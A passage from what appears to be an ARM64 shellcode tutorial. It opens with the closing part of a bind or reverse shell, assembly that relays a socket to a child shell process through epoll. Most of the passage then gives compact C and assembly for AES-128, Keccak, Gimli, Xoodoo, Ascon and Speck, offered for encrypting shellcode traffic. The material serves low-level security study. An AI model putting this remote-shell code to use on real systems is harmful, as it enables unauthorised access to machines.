    mov     x8, SYS_connect
    svc     0
    add     sp, sp, 16
    cbnz    x0, cls_sck      // if(x0 != 0) goto cls_sck
.endif
    // efd = epoll_create1(0);
    mov     x8, SYS_epoll_create1
    svc     0
    str     w0, [sp, efd]

    // epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
    ldr     w2, [sp, s]
    ldr     w4, [sp, out0]
poll_init:
    mov     x8, SYS_epoll_ctl
    mov     x1, EPOLL_CTL_ADD
    add     x3, sp, evts
    stp     x1, x2, [x3]
    ldr     w0, [sp, efd]
    svc     0
    cmp     w2, w4
    mov     w2, w4
    bne     poll_init
    // now loop until user exits or some other error
poll_wait:
    // epoll_pwait(efd, &evts, 1, -1, NULL);
    mov     x8, SYS_epoll_pwait
    mov     x4, xzr              // sigmask   = NULL
    mvn     x3, xzr              // timeout   = -1
    mov     x2, 1                // maxevents = 1
    add     x1, sp, evts         // *events   = &evts
    ldr     w0, [sp, efd]        // epfd      = efd
    svc     0

    // if (r < 0) break;
    tbnz    x0, 31, cls_efd

    // if (!(evts.events & EPOLLIN)) break;
    ldp     x0, x1, [sp, evts]
    tbz     w0, 0, cls_efd

    ldr     w3, [sp, s]
    ldp     w5, w4, [sp, in1]

    cmp     w1, w3

    // r = (fd == s) ? s : out[0];
    csel    w0, w3, w4, eq

    // w = (fd == s) ? in[1] : s;
    csel    w3, w5, w3, eq

    // read(r, buf, BUFSIZ);
    mov     x8, SYS_read
    mov     x2, BUFSIZ
    add     x1, sp, buf
    svc     0
    cbz     x0, cls_efd

    // encrypt/decrypt buffer

    // write(w, buf, len);
    mov     x8, SYS_write
    mov     w2, w0
    mov     w0, w3
    svc     0
    b       poll_wait
cls_efd:
    // epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);
    mov     x8, SYS_epoll_ctl
    mov     x3, xzr
    mov     x1, EPOLL_CTL_DEL
    ldp     w0, w2, [sp, efd]
    svc     0

    // epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);
    ldr     w2, [sp, out0]
    ldr     w0, [sp, efd]
    svc     0

    // close(efd);
    mov     x8, SYS_close
    ldr     w0, [sp, efd]
    svc     0

    // shutdown(s, SHUT_RDWR);
    mov     x8, SYS_shutdown
    mov     x1, SHUT_RDWR
    ldr     w0, [sp, s]
    svc     0
cls_sck:
    // close(s);
    mov     x8, SYS_close
    ldr     w0, [sp, s]
    svc     0

.ifdef BIND
    // close(s2);
    mov     x8, SYS_close
    ldr     w0, [sp, s2]
    svc     0
.endif
    // kill(pid, SIGCHLD);
    mov     x8, SYS_kill
    mov     x1, SIGCHLD
    ldr     w0, [sp, id]
    svc     0

    // close(in[1]);
    mov     x8, SYS_close
    ldr     w0, [sp, in1]
    svc     0

    // close(out[0]);
    mov     x8, SYS_close
    ldr     w0, [sp, out0]
    svc     0

.ifdef EXIT
    // exit(0);
    mov     x8, SYS_exit
    svc     0
.else
    // deallocate stack
    add     sp, sp, (ds_tbl_size & -16) + 16
    ret
.endif

7. Encryption

Every one of you reading this should learn about cryptography. Yes, it’s a complex subject, but you don’t need to be a mathematician just to learn about all the various algorithms that exist. Many cryptographic algorithms intended to protect data exist, but not all of them were designed for resource constrained-environments. In this section, you’ll see a number of cryptographic algorithms that you might consider using in a shellcode at some point. The block ciphers only implement encryption. That is to say, there is no inverse function provided and therefore cannot be used with a mode like Cipher Block Chaining (CBC) mode. Encryption is all that’s required to implement Counter (CTR) mode. Moreover, it’s likely that permutation-based cryptography will eventually replace traditional types of encryption. The algorithms shown here are intentionally optimized for size rather than speed.

Also…None of the algorithms presented here are written to protect against side-channel attacks. That’s just in case anyone wants to point out a weakness. 😉

7.1 AES-128

A block cipher published in 1998 and originally called ‘Rijndael’ after its designers, Vincent Rijmen and Joan Daemen. Today, it’s known as the Advanced Encryption Standard (AES). I’ve included it here because AES extensions are only an optional component of ARM. The Cortex A53 that comes with the Raspberry Pi 3 does not have support for AES. This implementation along with others can be found in this Github repository.

ADVANCED ENCRYPTION STANDARD (AES)

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned char B;
typedef unsigned int W;
// Multiplication over GF(2**8)
W M(W x){
    W t=x&0x80808080;
    return((x^t)*2)^((t>>7)*27);
}
// SubByte
B S(B w) {
    B j,y,z;
    
    if(w) {
      for(z=j=0,y=1;--j;y=(!z&&y==w)?z=1:y,y^=M(y));
      z=y;F(4)z^=y=(y<<1)|(y>>7);
    }
    return z^99;
}
void E(B *s) {
    W i,w,x[8],c=1,*k=(W*)&x[4];

    // copy plain text + master key to x
    F(8)x[i]=((W*)s)[i];

    for(;;){
      // AddRoundKey, 1st part of ExpandRoundKey
      w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];

      // AddRoundConstant, perform 2nd part of ExpandRoundKey
      w=R(w,8)^c;F(4)w=k[i]^=w;

      // if round 11, stop; 
      if(c==108)break; 
      
      // update round constant
      c=M(c);

      // SubBytes and ShiftRows
      F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);

      // if not round 11, MixColumns
      if(c!=108)
        F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    }
}

The handwritten assembly results in an approx. 40% less code when compared with GNU CC, generated assembly. The use of CCMP and CSEL for the statement : y = (!z && y == w) ? z = 1 : y; should protect against side-channel attacks. However, as I stated at the beginning of this section, I am not a cryptographer and do not wish to make security claims on the implementations provided here. The BFXIL instruction is used to replace the low 8-bits of register input to the SubByte subroutine.

// AES-128 Encryption in ARM64 assembly
// 352 bytes

    .arch armv8-a
    .text

    .global E

// *****************************
// Multiplication over GF(2**8)
// *****************************
M:
    and      w10, w14, 0x80808080
    mov      w12, 27
    lsr      w8, w10, 7
    mul      w8, w8, w12
    eor      w10, w14, w10
    eor      w10, w8, w10, lsl 1
    ret

// *****************************
// B SubByte(B x);
// *****************************
S:
    str      lr, [sp, -16]!
    ands     w7, w13, 0xFF
    beq      SB2

    mov      w14, 1
    mov      w15, 1
    mov      x3, 0xFF
SB0:
    cmp      w15, 1
    ccmp     w14, w7, 0, eq
    csel     w14, w15, w14, eq
    csel     w15, wzr, w15, eq
    bl       M
    eor      w14, w14, w10
    subs     x3, x3, 1
    bne      SB0

    and      w7, w14, 0xFF
    mov      x3, 4
SB1:
    lsr      w10, w14, 7
    orr      w14, w10, w14, lsl 1
    eor      w7, w7, w14
    subs     x3, x3, 1
    bne      SB1
SB2:
    mov      w10, 99
    eor      w7, w7, w10
    bfxil    w13, w7, 0, 8
    ldr      lr, [sp], 16
    ret

// *****************************
// void E(void *s);
// *****************************
E:
    str      lr, [sp, -16]!
    sub      sp, sp, 32

    // copy plain text + master key to x
    // F(8)x[i]=((W*)s)[i];
    ldp      x5, x6, [x0]
    ldp      x7, x8, [x0, 16]
    stp      x5, x6, [sp]
    stp      x7, x8, [sp, 16]

    // c = 1
    mov      w4, 1
L0:
    // AddRoundKey, 1st part of ExpandRoundKey
    // w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
    mov      x2, xzr
    ldr      w13, [sp, 16+3*4]
    add      x1, sp, 16
L1:
    bl       S
    ror      w13, w13, 8
    ldr      w10, [sp, x2, lsl 2]
    ldr      w11, [x1, x2, lsl 2]
    eor      w10, w10, w11
    str      w10, [x0, x2, lsl 2]

    add      x2, x2, 1
    cmp      x2, 4
    bne      L1

    // AddRoundConstant, perform 2nd part of ExpandRoundKey
    // w=R(w,8)^c;F(4)w=k[i]^=w;
    eor      w13, w4, w13, ror 8
L2:
    ldr      w10, [x1]
    eor      w13, w13, w10
    str      w13, [x1], 4

    subs     x2, x2, 1
    bne      L2

    // if round 11, stop
    // if(c==108)break;
    cmp      w4, 108
    beq      L5

    // update round constant
    // c=M(c);
    mov      w14, w4
    bl       M
    mov      w4, w10

    // SubBytes and ShiftRows
    // F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);
L3:
    ldrb     w13, [x0, x2]
    bl       S
    and      w10, w2, 3
    lsr      w11, w2, 2
    sub      w11, w11, w10
    and      w11, w11, 3
    add      w10, w10, w11, lsl 2
    strb     w13, [sp, w10, uxtw]

    add      x2, x2, 1
    cmp      x2, 16
    bne      L3

    // if (c != 108)
    cmp      w4, 108
L4:
    beq      L0
    subs     x2, x2, 4

    // MixColumns
    // F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    ldr      w13, [sp, x2]
    eor      w14, w13, w13, ror 8
    bl       M
    eor      w14, w10, w13, ror 8
    eor      w14, w14, w13, ror 16
    eor      w14, w14, w13, ror 24
    str      w14, [sp, x2]

    b        L4
L5:
    add      sp, sp, 32
    ldr      lr, [sp], 16
    ret

7.2 KECCAK

A permutation function designed by the Keccak team (Guido Bertoni, Joan Daemen, Michaël Peeters and Gilles Van Assche).

#define R(v,n)(((v)<<(n))|((v)>>(64-(n))))
#define F(a,b)for(a=0;a<b;a++)
  
void keccak(void*p){
  unsigned long long n,i,j,r,x,y,t,Y,b[5],*s=p;
  unsigned char RC=1;
  
  F(n,24){
    F(i,5){b[i]=0;F(j,5)b[i]^=s[i+5*j];}
    F(i,5){
      t=b[(i+4)%5]^R(b[(i+1)%5],1);
      F(j,5)s[i+5*j]^=t;}
    t=s[1],y=r=0,x=1;
    F(j,24)
      r+=j+1,Y=2*x+3*y,x=y,y=Y%5,
      Y=s[x+5*y],s[x+5*y]=R(t,r%64),t=Y;
    F(j,5){
      F(i,5)b[i]=s[i+5*j];
      F(i,5)
        s[i+5*j]=b[i]^(~b[(i+1)%5]&b[(i+2)%5]);}
    F(j,7)
      if((RC=(RC<<1)^(113*(RC>>7)))&2)
        *s^=1ULL<<((1<<j)-1);
  }
}

The following source is an example of where preprocessor directives are used to ease implementation of the original source code. This would be first processed with CPP using the -E option. I’ve done this so it’s easier to create Keccak-p[800, 22] assembly code for the ARM32 or ARM64 architecture if required later.

The ARM instruction set doesn’t feature a modulus instruction. Unlike the DIV or IDIV instructions on x86, UDIV and SDIV don’t calculate the remainder. The solution is to use a bitwise AND where the divisor is a power of 2 and a combination of division, multiplication and subtraction for everything else. The formula for divisors that are not a power of 2 is : a - (n * int(a/n)). To implement in ARM64 assembly, UDIV and MSUB are used.

// keccak-p[1600, 24]
// 428 bytes

    .arch armv8-a
    .text
    .global k1600

    #define s x0
    #define n x1
    #define i x2
    #define j x3
    #define r x4
    #define x x5
    #define y x6
    #define t x7
    #define Y x8
    #define c x9   // round constant (unsigned char)
    #define d x10
    #define v x11
    #define u x12
    #define b sp   // local buffer

k1600:
    sub     sp, sp, 64
    // F(n,24){
    mov     n, 24
    mov     c, 1                // c = 1
L0:
    mov     d, 5
    // F(i,5){b[i]=0;F(j,5)b[i]^=s[i+j*5];}
    mov     i, 0                // i = 0
L1:
    mov     j, 0                // j = 0
    mov     u, 0                // u = 0
L2:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     v, [s, v, lsl 3]    // v = s[v]

    eor     u, u, v             // u ^= v

    add     j, j, 1             // j = j + 1
    cmp     j, 5                // j < 5
    bne     L2

    str     u, [b, i, lsl 3]    // b[i] = u

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L1

    // F(i,5){
    mov     i, 0
L3:
    // t=b[(i+4)%5] ^ R(b[(i+1)%5], 63);
    add     v, i, 4             // v = i + 4
    udiv    u, v, d             // u = (v / 5)
    msub    v, u, d, v          // v = (v - (u * 5))
    ldr     t, [b, v, lsl 3]    // t = b[v]

    add     v, i, 1             // v = i + 1
    udiv    u, v, d             // u = (v / 5)
    msub    v, u, d, v          // v = (v - (u * 5))
    ldr     u, [b, v, lsl 3]    // u = b[v]

    eor     t, t, u, ror 63     // t ^= R(u, 63)

    // F(j,5)s[i+j*5]^=t;}
    mov     j, 0
L4:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     u, [s, v, lsl 3]    // u = s[v]
    eor     u, u, t             // u ^= t
    str     u, [s, v, lsl 3]    // s[v] = u 

    add     j, j, 1             // j = j + 1
    cmp     j, 5                // j < 5
    bne     L4

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L3

    // t=s[1],y=r=0,x=1;
    ldr     t, [s, 8]           // t = s[1]
    mov     y, 0                // y = 0
    mov     r, 0                // r = 0
    mov     x, 1                // x = 1

    // F(j,24)
    mov     j, 0
L5:
    add     j, j, 1             // j = j + 1
    // r+=j+1,Y=(x*2)+(y*3),x=y,y=Y%5,
    add     r, r, j             // r = r + j
    add     Y, y, y, lsl 1      // Y = y * 3
    add     Y, Y, x, lsl 1      // Y = Y + (x * 2)
    mov     x, y                // x = y 
    udiv    y, Y, d             // y = (Y / 5)
    msub    y, y, d, Y          // y = (Y - (y * 5)) 

    // Y=s[x+y*5],s[x+y*5]=R(t, -(r - 64) % 64),t=Y;
    madd    v, y, d, x          // v = (y * 5) + x
    ldr     Y, [s, v, lsl 3]    // Y = s[v]
    neg     u, r
    ror     t, t, u             // t = R(t, u)
    str     t, [s, v, lsl 3]    // s[v] = t 
    mov     t, Y

    cmp     j, 24               // j < 24
    bne     L5

    // F(j,5){
    mov     j, 0                // j = 0
L6:
    // F(i,5)b[i] = s[i+j*5];
    mov     i, 0                // i = 0
L7:
    madd    v, j, d, i          // v = (j * 5) + i
    ldr     t, [s, v, lsl 3]    // t = s[v]
    str     t, [b, i, lsl 3]    // b[i] = t

    add     i, i, 1             // i = i + 1
    cmp     i, 5                // i < 5
    bne     L7

    // F(i,5)
    mov     i, 0                // i = 0
L8:
    // s[i+j*5] = b[i] ^ (b[(i+2)%5] & ~b[(i+1)%5]);}
    add     v, i, 2             // v = i + 2 
    udiv    u, v, d             // u = v / 5
    msub    v, u, d, v          // v = (v - (u * 5)) 
    ldr     t, [b, v, lsl 3]    // t = b[v]

    add     v, i, 1             // v = i + 1
    udiv    u, v, d             // u = v / 5 
    msub    v, u, d, v          // v = (v - (u * 5)) 
    ldr     u, [b, v, lsl 3]    // u = b[v]

    bic     u, t, u             // u = (t & ~u)

    ldr     t, [b, i, lsl 3]    // t = b[i]
    eor     t, t, u             // t ^= u

    madd    v, j, d, i          // v = (j * 5) + i
    str     t, [s, v, lsl 3]    // s[v] = t

    add     i, i, 1             // i++
    cmp     i, 5                // i < 5
    bne     L8

    add     j, j, 1
    cmp     j, 5
    bne     L6

    // F(j,7)
    mov     j, 0                // j = 0
    mov     d, 113
L9:
    // if((c=(c<<1)^((c>>7)*113))&2)
    lsr     t, c, 7             // t = c >> 7
    mul     t, t, d             // t = t * 113 
    eor     c, t, c, lsl 1      // c = t ^ (c << 1)
    and     c, c, 255           // c = c % 256 
    tbz     c, 1, L10           // if (c & 2)

    //   *s^=1ULL<<((1<<j)-1);
    mov     v, 1                // v = 1
    lsl     u, v, j             // u = v << j 
    sub     u, u, 1             // u = u - 1
    lsl     v, v, u             // v = v << u
    ldr     t, [s]              // t = s[0]
    eor     t, t, v             // t ^= v
    str     t, [s]              // s[0] = t
L10:
    add     j, j, 1             // j = j + 1
    cmp     j, 7                // j < 7
    bne     L9

    subs    n, n, 1             // n = n - 1
    bne     L0

    add     sp, sp, 64
    ret

7.3 GIMLI

A permutation function designed by Daniel J. Bernstein, Stefan Kölbl, Stefan Lucks, Pedro Maat Costa Massolino, Florian Mendel, Kashif Nawaz, Tobias Schneider, Peter Schwabe, François-Xavier Standaert, Yosuke Todo, and Benoît Viguier.

#define R(v,n)(((v)<<(n))|((v)>>(32-(n))))
#define X(a,b)(t)=(s[a]),(s[a])=(s[b]),(s[b])=(t)
  
void gimli(void*p){
  unsigned int r,j,t,x,y,z,*s=p;

  for(r=24;r>0;--r){
    for(j=0;j<4;j++)
      x=R(s[j],24),
      y=R(s[4+j],9),
      z=s[8+j],   
      s[8+j]=x^(z+z)^((y&z)*4),
      s[4+j]=y^x^((x|z)*2),
      s[j]=z^y^((x&y)*8);
    t=r&3;    
    if(!t)
      X(0,1),X(2,3),
      *s^=0x9e377900|r;   
    if(t==2)X(0,2),X(1,3);
  }
}

Thus far, I’ve only seen a hash function implemented with this algorithm. However, at the 2018 Advances in permutation-based cryptography, Benoît Viguier suggests using an Even-Mansour construction to implement a block cipher.

  
// Gimli in ARM64 assembly
// 152 bytes

    .arch armv8-a
    .text

    .global gimli

gimli:
    ldr    w8, =(0x9e377900 | 24)  // c = 0x9e377900 | 24; 
L0:
    mov    w7, 4                // j = 4
    mov    x1, x0               // x1 = s
L1:
    ldr    w2, [x1]             // x = R(s[j],  8);
    ror    w2, w2, 8

    ldr    w3, [x1, 16]         // y = R(s[4+j], 23);
    ror    w3, w3, 23

    ldr    w4, [x1, 32]         // z = s[8+j];

    // s[8+j] = x^(z<<1)^((y&z)<<2);
    eor    w5, w2, w4, lsl 1    // t0 = x ^ (z << 1)
    and    w6, w3, w4           // t1 = y & z
    eor    w5, w5, w6, lsl 2    // t0 = t0 ^ (t1 << 2)
    str    w5, [x1, 32]         // s[8 + j] = t0

    // s[4+j] = y^x^((x|z)<<1);
    eor    w5, w3, w2           // t0 = y ^ x
    orr    w6, w2, w4           // t1 = x | z       
    eor    w5, w5, w6, lsl 1    // t0 = t0 ^ (t1 << 1)
    str    w5, [x1, 16]         // s[4+j] = t0 

    // s[j] = z^y^((x&y)<<3);
    eor    w5, w4, w3           // t0 = z ^ y
    and    w6, w2, w3           // t1 = x & y
    eor    w5, w5, w6, lsl 3    // t0 = t0 ^ (t1 << 3)
    str    w5, [x1], 4          // s[j] = t0, s++

    subs   w7, w7, 1
    bne    L1                   // j != 0

    ldp    w1, w2, [x0]
    ldp    w3, w4, [x0, 8]

    // apply linear layer
    // t0 = (r & 3);
    ands   w5, w8, 3
    bne    L2

    // X(s[2], s[3]);
    stp    w4, w3, [x0, 8]
    // s[0] ^= (0x9e377900 | r);
    eor    w2, w2, w8
    // X(s[0], s[1]);
    stp    w2, w1, [x0]
L2:
    // if (t == 2)
    cmp    w5, 2
    bne    L3

    // X(s[0], s[2]);
    stp    w1, w2, [x0, 8]
    // X(s[1], s[3]);
    stp    w3, w4, [x0]
L3:
    sub    w8, w8, 1           // r--
    uxtb   w5, w8
    cbnz   w5, L0              // r != 0
    ret

7.4 XOODOO

A permutation function designed by the Keccak team. The cookbook includes information on implementing Authenticated Encryption (AE) and a tweakable Wide Block Cipher (WBC).

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define X(u,v)t=s[u],s[u]=s[v],s[v]=t
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void xoodoo(void*p){
  W e[4],a,b,c,t,r,i,*s=p;
  W x[12]={
    0x058,0x038,0x3c0,0x0d0,
    0x120,0x014,0x060,0x02c,
    0x380,0x0f0,0x1a0,0x012};

  for(r=0;r<12;r++){
    F(4)
      e[i]=R(s[i]^s[i+4]^s[i+8],18),
      e[i]^=R(e[i],9);
    F(12)
      s[i]^=e[(i-1)&3];
    X(7,4);X(7,5);X(7,6);
    s[0]^=x[r];
    F(4)
      a=s[i],
      b=s[i+4],
      c=R(s[i+8],21),
      s[i+8]=R((b&~a)^c,24),
      s[i+4]=R((a&~c)^b,31),
      s[i]^=c&~b;
    X(8,10);X(9,11);
  }
}

Again, this is all optimized for size rather than performance.

// Xoodoo in ARM64 assembly
// 268 bytes

    .arch armv8-a
    .text

    .global xoodoo

xoodoo:
    sub    sp, sp, 16          // allocate 16 bytes
    adr    x8, rc
    mov    w9, 12               // 12 rounds
L0:
    mov    w7, 0                // i = 0
    mov    x1, x0
L1:
    ldr    w4, [x1, 32]         // w4 = s[i+8]
    ldr    w3, [x1, 16]         // w3 = s[i+4]
    ldr    w2, [x1], 4          // w2 = s[i+0], advance x1 by 4

    // e[i] = R(s[i] ^ s[i+4] ^ s[i+8], 18);
    eor    w2, w2, w3
    eor    w2, w2, w4
    ror    w2, w2, 18

    // e[i] ^= R(e[i], 9);
    eor    w2, w2, w2, ror 9
    str    w2, [sp, x7, lsl 2]  // store in e

    add    w7, w7, 1            // i++
    cmp    w7, 4                // i < 4
    bne    L1                   //

    // s[i]^= e[(i - 1) & 3];
    mov    w7, 0                // i = 0
L2:
    sub    w2, w7, 1
    and    w2, w2, 3            // w2 = i & 3
    ldr    w2, [sp, x2, lsl 2]  // w2 = e[(i - 1) & 3]
    ldr    w3, [x0, x7, lsl 2]  // w3 = s[i]
    eor    w3, w3, w2           // w3 ^= w2 
    str    w3, [x0, x7, lsl 2]  // s[i] = w3 
    add    w7, w7, 1            // i++
    cmp    w7, 12               // i < 12
    bne    L2

    // Rho west
    // X(s[7], s[4]);
    // X(s[7], s[5]);
    // X(s[7], s[6]);
    ldp    w2, w3, [x0, 16]
    ldp    w4, w5, [x0, 24]
    stp    w5, w2, [x0, 16]
    stp    w3, w4, [x0, 24]

    // Iota
    // s[0] ^= *rc++;
    ldrh   w2, [x8], 2         // load half-word, advance by 2
    ldr    w3, [x0]            // load word
    eor    w3, w3, w2          // xor
    str    w3, [x0]            // store word

    mov    w7, 4
    mov    x1, x0
L3:
    // Chi and Rho east
    // a = s[i+0];
    ldr    w2, [x1]

    // b = s[i+4];
    ldr    w3, [x1, 16]

    // c = R(s[i+8], 21);
    ldr    w4, [x1, 32]
    ror    w4, w4, 21

    // s[i+8] = R((b & ~a) ^ c, 24);
    bic    w5, w3, w2
    eor    w5, w5, w4
    ror    w5, w5, 24
    str    w5, [x1, 32]

    // s[i+4] = R((a & ~c) ^ b, 31);
    bic    w5, w2, w4
    eor    w5, w5, w3
    ror    w5, w5, 31
    str    w5, [x1, 16]

    // s[i+0]^= c & ~b;
    bic    w5, w4, w3
    eor    w5, w5, w2
    str    w5, [x1], 4

    // i--
    subs   w7, w7, 1
    bne    L3

    // X(s[8], s[10]);
    // X(s[9], s[11]);
    ldp    w2, w3, [x0, 32] // 8, 9
    ldp    w4, w5, [x0, 40] // 10, 11
    stp    w2, w3, [x0, 40]
    stp    w4, w5, [x0, 32]

    subs   w9, w9, 1           // r--
    bne    L0                  // r != 0

    // release stack
    add    sp, sp, 16
    ret
    // round constants
rc:
    .hword 0x058, 0x038, 0x3c0, 0x0d0
    .hword 0x120, 0x014, 0x060, 0x02c
    .hword 0x380, 0x0f0, 0x1a0, 0x012

7.5 ASCON

A permutation function designed by Christoph Dobraunig, Maria Eichlseder, Florian Mendel and Martin Schläffer. Ascon uses a sponge-based mode of operation. The recommended key, tag and nonce length is 128 bits. The sponge operates on a state of 320 bits, with injected message blocks of 64 or 128 bits. The core permutation iteratively applies an SPN-based round transformation with a 5-bit S-box and a lightweight linear layer.

Ascon website

#define R(x,n)(((x)>>(n))|((x)<<(64-(n))))
typedef unsigned long long W;

void ascon(void*p) {
    int i;
    W   t0,t1,t2,t3,t4,x0,x1,x2,x3,x4,*s=(W*)p;
    
    // load 320-bit state
    x0=s[0];x1=s[1];x2=s[2];x3=s[3];x4=s[4];
    // apply 12 rounds
    for(i=0;i<12;i++) {
      // add round constant
      x2^=((0xFULL-i)<<4)|i;
      // apply non-linear layer
      x0^=x4;x4^=x3;x2^=x1;
      t4=(x0&~x4);t3=(x4&~x3);t2=(x3&~x2);t1=(x2&~x1);t0=(x1&~x0);
      x0^=t1;x1^=t2;x2^=t3;x3^=t4;x4^=t0;
      x1^=x0;x0^=x4;x3^=x2;x2=~x2;
      // apply linear diffusion layer
      x0^=R(x0,19)^R(x0,28);x1^=R(x1,61)^R(x1,39);
      x2^=R(x2,1)^R(x2,6);x3^=R(x3,10)^R(x3,17);
      x4^=R(x4,7)^R(x4,41);
    }
    // save 320-bit state
    s[0]=x0;s[1]=x1;s[2]=x2;s[3]=x3;s[4]=x4;
}

This algorithm works really well on the ARM64 architecture. Very simple operations.

  
// ASCON in ARM64 assembly
// 192 bytes

    .arch armv8-a
    .text

    .global ascon

ascon:
    mov    x10, x0
    // load 320-bit state
    ldp    x0, x1, [x10]
    ldp    x2, x3, [x10, 16]
    ldr    x4, [x10, 32]

    // apply 12 rounds
    mov    x11, xzr
L0:
    // add round constant
    // x2^=((0xFULL-i)<<4)|i;
    mov    x12, 0xF
    sub    x12, x12, x11
    orr    x12, x11, x12, lsl 4
    eor    x2, x2, x12

    // apply non-linear layer
    // x0^=x4;x4^=x3;x2^=x1;
    eor    x0, x0, x4
    eor    x4, x4, x3
    eor    x2, x2, x1

    // t4=(x0&~x4);t3=(x4&~x3);t2=(x3&~x2);t1=(x2&~x1);t0=(x1&~x0);
    bic    x5, x1, x0
    bic    x6, x2, x1
    bic    x7, x3, x2
    bic    x8, x4, x3
    bic    x9, x0, x4

    // x0^=t1;x1^=t2;x2^=t3;x3^=t4;x4^=t0;
    eor    x0, x0, x6
    eor    x1, x1, x7
    eor    x2, x2, x8
    eor    x3, x3, x9
    eor    x4, x4, x5

    // x1^=x0;x0^=x4;x3^=x2;x2=~x2;
    eor    x1, x1, x0
    eor    x0, x0, x4
    eor    x3, x3, x2
    mvn    x2, x2

    // apply linear diffusion layer
    // x0^=R(x0,19)^R(x0,28);
    ror    x5, x0, 19
    eor    x5, x5, x0, ror 28
    eor    x0, x0, x5

    // x1^=R(x1,61)^R(x1,39);
    ror    x5, x1, 61
    eor    x5, x5, x1, ror 39
    eor    x1, x1, x5

    // x2^=R(x2,1)^R(x2,6);
    ror    x5, x2, 1
    eor    x5, x5, x2, ror 6
    eor    x2, x2, x5

    // x3^=R(x3,10)^R(x3,17);
    ror    x5, x3, 10
    eor    x5, x5, x3, ror 17
    eor    x3, x3, x5

    // x4^=R(x4,7)^R(x4,41);
    ror    x5, x4, 7
    eor    x5, x5, x4, ror 41
    eor    x4, x4, x5

    // i++
    add    x11, x11, 1
    // i < 12
    cmp    x11, 12
    bne    L0

    // save 320-bit state
    stp    x0, x1, [x10]
    stp    x2, x3, [x10, 16]
    str    x4, [x10, 32]
    ret

7.6 SPECK

A block cipher from the NSA that was intended to make its way into IoT devices. Designed by Ray Beaulieu, Douglas Shors, Jason Smith, Stefan Treatman-Clark, Bryan Weeks and Louis Wingers.

The SIMON and SPECK Families of Lightweight Block Ciphers

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void speck(void*mk,void*p){
  W k[4],*x=p,i,t;
  
  F(4)k[i]=((W*)mk)[i];
  
  F(27)
    *x=(R(*x,8)+x[1])^*k,
    x[1]=R(x[1],29)^*x,
    t=k[3],
    k[3]=(R(k[1],8)+*k)^i,
    *k=R(*k,29)^k[3],
    k[1]=k[2],k[2]=t;
}

SPECK has been surrounded by controversy since the NSA proposed including it in the ISO/IEC 29192-2 portfolio, however, they are still useful for shellcodes.

// SPECK64/128 in ARM64 assembly
// 80 bytes

    .arch armv8-a
    .text

    .global speck64

    // speck64(void*mk, void*data);
speck64:
    // load 128-bit key
    // k0 = k[0]; k1 = k[1]; k2 = k[2]; k3 = k[3];
    ldp    w5, w6, [x0]
    ldp    w7, w8, [x0, 8]
    // load 64-bit plain text
    ldp    w2, w4, [x1]         // x0 = x[0]; x1 = k[1];
    mov    w3, wzr              // i=0
L0:
    ror    w2, w2, 8
    add    w2, w2, w4           // x0 = (R(x0, 8) + x1) ^ k0;
    eor    w2, w2, w5           //
    eor    w4, w2, w4, ror 29   // x1 = R(x1, 3) ^ x0;
    mov    w9, w8               // backup k3
    ror    w6, w6, 8
    add    w8, w5, w6           // k3 = (R(k1, 8) + k0) ^ i;
    eor    w8, w8, w3           //
    eor    w5, w8, w5, ror 29   // k0 = R(k0, 3) ^ k3;
    mov    w6, w7               // k1 = k2;
    mov    w7, w9               // k2 = t;
    add    w3, w3, 1            // i++;
    cmp    w3, 27               // i < 27;
    bne    L0

    // save result
    stp    w2, w4, [x1]         // x[0] = x0; x[1] = x1;
    ret

Since there isn’t a huge difference between the two variants, here’s the 128/256 version that works best on 64-bit architectures.

#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned long long W;

void speck128(void*mk,void*p){
  W k[4],*x=p,i,t;

  F(4)k[i]=((W*)mk)[i];
  
  F(34)
    x[1]=(R(x[1],8)+*x)^*k,
    *x=R(*x,61)^x[1],
    t=k[3],
    k[3]=(R(k[1],8)+*k)^i,
    *k=R(*k,61)^k[3],
    k[1]=k[2],k[2]=t;
}

Again, the assembly is almost exactly the same.

  
// SPECK128/256 in ARM64 assembly
// 80 bytes

    .arch armv8-a
    .text

    .global speck128

    // speck128(void*mk, void*data);
speck128:
    // load 256-bit key
    // k0 = k[0]; k1 = k[1]; k2 = k[2]; k3 = k[3];
    ldp    x5, x6, [x0]
    ldp    x7, x8, [x0, 16]
    // load 128-bit plain text
    ldp    x2, x4, [x1]         // x0 = x[0]; x1 = k[1];
    mov    x3, xzr              // i=0
L0:
    ror    x4, x4, 8
    add    x4, x4, x2           // x1 = (R(x1, 8) + x0) ^ k0;
    eor    x4, x4, x5           //
    eor    x2, x4, x2, ror 61   // x0 = R(x0, 61) ^ x1;
    mov    x9, x8               // backup k3
    ror    x6, x6, 8
    add    x8, x5, x6           // k3 = (R(k1, 8) + k0) ^ i;
    eor    x8, x8, x3           //
    eor    x5, x8, x5, ror 61   // k0 = R(k0, 61) ^ k3;
    mov    x6, x7               // k1 = k2;
    mov    x7, x9               // k2 = t;
    add    x3, x3, 1            // i++;
    cmp    x3, 34               // i < 34;
    bne    L0

    // save result
    stp    x2, x4, [x1]         // x[0] = x0; x[1] = x1;
    ret

The designs are nice, but independent cryptographers suggest there may be weaknesses in these ciphers that only the NSA know about.

7.7 SIMECK

